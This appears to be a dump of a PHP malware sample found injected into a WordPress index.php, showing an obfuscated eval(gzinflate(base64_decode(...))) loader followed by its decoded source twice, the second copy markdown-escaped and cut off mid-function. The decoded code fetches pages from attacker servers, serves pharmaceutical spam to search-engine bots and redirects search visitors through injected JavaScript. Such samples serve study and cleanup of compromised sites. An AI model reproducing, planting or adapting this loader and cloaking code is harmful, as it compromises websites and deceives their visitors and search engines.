evandhoffman/Payload.php

## lol.php
<?php eval(gzinflate(base64_decode('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')));?>^M
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

## Payload.php
$ php crap.php
<?php
if (!defined('frmDs')){
	define('frmDs' ,1);
	error_reporting(0);

	function frm_dl ($url) {
		if (function_exists('curl_init')) {
			$ch = curl_init($url);
			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
			$out = curl_exec ($ch);
			if (curl_errno($ch) !== 0) $out = false;
			curl_close ($ch);
		} else {$out = @file_get_contents($url);}
		return trim($out);
	}

	function frm_crpt($in){
		$il=strlen($in);$o='';
		for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
		return $o;
	}

	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
		$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
		$fe = file_exists($f);
		if(!$fe || time() - filemtime($f) > 60 * $cmtime)
		{
			$dlc=frm_dl($link);
			if($fe && $dlc===false)
				@touch($f);
			else
			{
				if($fe && empty($dlc) && $toe)
				{
					@touch($f);
				}
				else
				{
					if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
					else{return $dlc;}
				}
			}
		}
		$fc = @file_get_contents($f);
		return ($fc)?frm_crpt($fc):'';
	}

	function frm_isbot(){
		$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
		if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
		$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
					array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
					array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
		foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
		if(!$ua)return true;
		$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
		foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
		$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
		$hba=array('google','msn','yahoo');
		if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
		return false;
	}

	function frm_tmpdir(){
		$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
            if ($t = getenv($v)) {$fs[]=$t;}
        }
        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
        $fs[]='.';

        foreach ($fs as $f){
        	$tf = $f.'/'.md5(rand());
        	if($fp = @fopen($tf, 'w')){
        		fclose($fp);
        		unlink($tf);
        		return $f;
        	}
        }
		return false;
	}

	function frm_seref(){
		$r = @strtolower($_SERVER["HTTP_REFERER"]);
		$ses = array('google','bing','yahoo','ask','aol');
		foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
		return false;
	}

	function frm_havekey($s=false){
		$nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
		$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
		if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
		foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
		return '';
	}

	function frm_strtonum($Str, $Check, $Magic) {
		$Int32Unit = 4294967296;
		$length = strlen($Str);
		for ($i = 0; $i < $length; $i++) {
			$Check *= $Magic;
			if ($Check >= $Int32Unit) {
				$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
				$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
			}
			$Check += ord($Str{$i});
		}
		return $Check;
	}

	function frm_chhash($String) {
		$Check1 =frm_strtonum($String, 0x1505, 0x21);
		$Check2 = frm_strtonum($String, 0, 0x1003F);
		$Check1 >>= 2;
		$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
		$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
		$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
		$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
		$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
		$Hashnum = ($T1 | $T2);
		$CheckByte = 0;
		$Flag = 0;
		$HashStr = sprintf('%u', $Hashnum) ;
		$length = strlen($HashStr);
		for ($i = $length - 1;  $i >= 0;  $i --) {
			$Re = $HashStr{$i};
			if (1 === ($Flag % 2)) {
				$Re += $Re;
				$Re = (int)($Re / 10) + ($Re % 10);
			}
			$CheckByte += $Re;
			$Flag ++;
		}
		$CheckByte %= 10;
		if (0 !== $CheckByte) {
			$CheckByte = 10 - $CheckByte;
			if (1 === ($Flag % 2) ) {
				if (1 === ($CheckByte % 2)) {
					$CheckByte += 9;
				}
				$CheckByte >>= 1;
			}
		}
		return '7'.$CheckByte.$HashStr;
	}

	function frm_chpr($url,$td){
		$ch=frm_chhash($url);
		$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
		if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
	}

	function frm_red($k){
		if(!frm_isbot() && frm_seref()){
			$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
			$s=@urlencode($_SERVER['HTTP_REFERER']);
			die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
		}
	}

	$tdir = frm_tmpdir();
	$isb=frm_isbot();
	$k=frm_havekey();
	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
		$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
		$sp = "http://uwvbfiyuw.byinter.net/stat/feed.php?pa=$parg&h=$host";
		//
		$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
		if($isb && ($ppr = frm_chpr($tp)) > 1){
			$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
			if($pc) die($pc);
		}
		//
		$ruri = strtolower($_SERVER['REQUEST_URI']);
		$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
		if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
			frm_red($k);
			die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
		}
		if (($ruri=='/' || $ruri=='/index.php') && $isb) {
			$c=frm_getcache($tdir, $sp ,60*24);
			if($c)die($c);
		}
		//
		if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
			if(strpos($sdl, '|'.$ruri.'|') !== false){
				frm_red($k);
				die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
			}
		}
	}
	if($k) frm_red($k);
}
?>
	<?php eval(gzinflate(base64_decode('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')));?>^M
	<?php
	/**
	* Front to the WordPress application. This file doesn't do anything, but loads
	* wp-blog-header.php which does and tells WordPress to load the theme.
	*
	* @package WordPress
	*/
	$ php crap.php
	<?php
	if (!defined('frmDs')){
	define('frmDs' ,1);
	error_reporting(0);

	function frm_dl ($url) {
	if (function_exists('curl_init')) {
	$ch = curl_init($url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$out = curl_exec ($ch);
	if (curl_errno($ch) !== 0) $out = false;
	curl_close ($ch);
	} else {$out = @file_get_contents($url);}
	return trim($out);
	}

	function frm_crpt($in){
	$il=strlen($in);$o='';
	for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
	return $o;
	}

	function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
	$f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
	$fe = file_exists($f);
	if(!$fe \|\| time() - filemtime($f) > 60 * $cmtime)
	{
	$dlc=frm_dl($link);
	if($fe && $dlc===false)
	@touch($f);
	else
	{
	if($fe && empty($dlc) && $toe)
	{
	@touch($f);
	}
	else
	{
	if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
	else{return $dlc;}
	}
	}
	}
	$fc = @file_get_contents($f);
	return ($fc)?frm_crpt($fc):'';
	}

	function frm_isbot(){
	$ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
	if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
	$rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
	array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
	array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
	foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
	if(!$ua)return true;
	$bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
	foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;
	$h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
	$hba=array('google','msn','yahoo');
	if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
	return false;
	}

	function frm_tmpdir(){
	$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
	foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
	if ($t = getenv($v)) {$fs[]=$t;}
	}
	if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
	$fs[]='.';

	foreach ($fs as $f){
	$tf = $f.'/'.md5(rand());
	if($fp = @fopen($tf, 'w')){
	fclose($fp);
	unlink($tf);
	return $f;
	}
	}
	return false;
	}

	function frm_seref(){
	$r = @strtolower($_SERVER["HTTP_REFERER"]);
	$ses = array('google','bing','yahoo','ask','aol');
	foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
	return false;
	}

	function frm_havekey($s=false){
	$nks = explode('\|','abilify\|albenza\|aldactone\|amoxil\|antabuse\|apcalis\|atarax\|baclofen\|bactrim\|bimatoprost\|buspar\|celebrex\|celexa\|cialis\|cipro\|clomid\|desyrel\|diflucan\|doxycycline\|elavil\|erectalis\|eriacta\|erythromycin\|finpecia\|flagyl\|glucophage\|inderal\|kamagra\|lasix\|levaquin\|levitra\|lexapro\|megalis\|mobic\|motilium\|nexium\|nolvadex\|orlistat\|paxil\|penisole\|periactin\|premarin\|priligy\|propecia\|proscar\|proventil\|retin-a\|robaxin\|seroquel\|silagra\|sildalis\|silvitra\|strattera\|stromectol\|p-force\|synthroid\|tadacip\|tadalis\|tadapox\|tenormin\|tetracycline\|topamax\|valtrex\|ventolin\|viagra\|vigora\|wellbutrin\|zanaflex\|zenegra\|zithromax\|sildenafil\|tadalafil\|vardenafil\|zovirax');
	$k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
	if (strpos($k,"site%3A")!==false\|\|strpos($k,"inurl%3A")!==false) return '';
	foreach ($nks as $n)if(preg_match("/(\b\|_)$n(\b\|_)/" , $k)) return $n;
	return '';
	}

	function frm_strtonum($Str, $Check, $Magic) {
	$Int32Unit = 4294967296;
	$length = strlen($Str);
	for ($i = 0; $i < $length; $i++) {
	$Check *= $Magic;
	if ($Check >= $Int32Unit) {
	$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
	$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
	}
	$Check += ord($Str{$i});
	}
	return $Check;
	}

	function frm_chhash($String) {
	$Check1 =frm_strtonum($String, 0x1505, 0x21);
	$Check2 = frm_strtonum($String, 0, 0x1003F);
	$Check1 >>= 2;
	$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) \| ($Check1 & 0x3F);
	$Check1 = (($Check1 >> 4) & 0x3FFC00 ) \| ($Check1 & 0x3FF);
	$Check1 = (($Check1 >> 4) & 0x3C000 ) \| ($Check1 & 0x3FFF);
	$T1 = (((($Check1 & 0x3C0) << 4) \| ($Check1 & 0x3C)) <<2 ) \| ($Check2 & 0xF0F );
	$T2 = (((($Check1 & 0xFFFFC000) << 4) \| ($Check1 & 0x3C00)) << 0xA) \| ($Check2 & 0xF0F0000 );
	$Hashnum = ($T1 \| $T2);
	$CheckByte = 0;
	$Flag = 0;
	$HashStr = sprintf('%u', $Hashnum) ;
	$length = strlen($HashStr);
	for ($i = $length - 1; $i >= 0; $i --) {
	$Re = $HashStr{$i};
	if (1 === ($Flag % 2)) {
	$Re += $Re;
	$Re = (int)($Re / 10) + ($Re % 10);
	}
	$CheckByte += $Re;
	$Flag ++;
	}
	$CheckByte %= 10;
	if (0 !== $CheckByte) {
	$CheckByte = 10 - $CheckByte;
	if (1 === ($Flag % 2) ) {
	if (1 === ($CheckByte % 2)) {
	$CheckByte += 9;
	}
	$CheckByte >>= 1;
	}
	}
	return '7'.$CheckByte.$HashStr;
	}

	function frm_chpr($url,$td){
	$ch=frm_chhash($url);
	$res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60247);
	if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
	}

	function frm_red($k){
	if(!frm_isbot() && frm_seref()){
	$r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
	$s=@urlencode($_SERVER['HTTP_REFERER']);
